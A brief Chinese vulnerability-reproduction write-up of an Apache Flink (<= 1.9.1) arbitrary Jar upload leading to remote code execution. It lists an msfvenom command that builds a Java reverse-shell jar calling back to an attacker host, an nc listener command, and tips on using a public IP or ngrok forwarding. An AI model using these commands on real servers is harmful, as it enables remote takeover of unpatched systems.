前言
记一次Apache Flink任意Jar包上传导致远程代码执行复现漏洞过程。
作者一直致力于小白都能看懂的漏洞复现过程,感谢大家们一路以来的支持!
致谢Cx01、丞相等表哥们。没有你们的帮助,没有这篇文章!
0x01 漏洞描述
近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞.
影响范围:<= 1.9.1(最新版本)
可能是我测的比较少,成功的概率1.9版本比较高。
0x02 漏洞威胁等级
高危
可导致远程代码执行
0x03 漏洞复现
第一步生成payload
msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f jar >fuck.jar
名字可以任意取
第二步生成监听端口,这里我选择nc监听端口。
nc -lvp port
第三步上传payload
最后直接返回shell
接着执行命令
0x04 复现那些坑
一定要生成公网ip的payload!!!
一定要生成公网ip的payload!!!
一定要生成公网ip的payload!!!
没有钱的小哥哥,小姐姐们可以选择一个Sunny-ngrok 工具进行端口转发。
官方Sunny-ngrok教程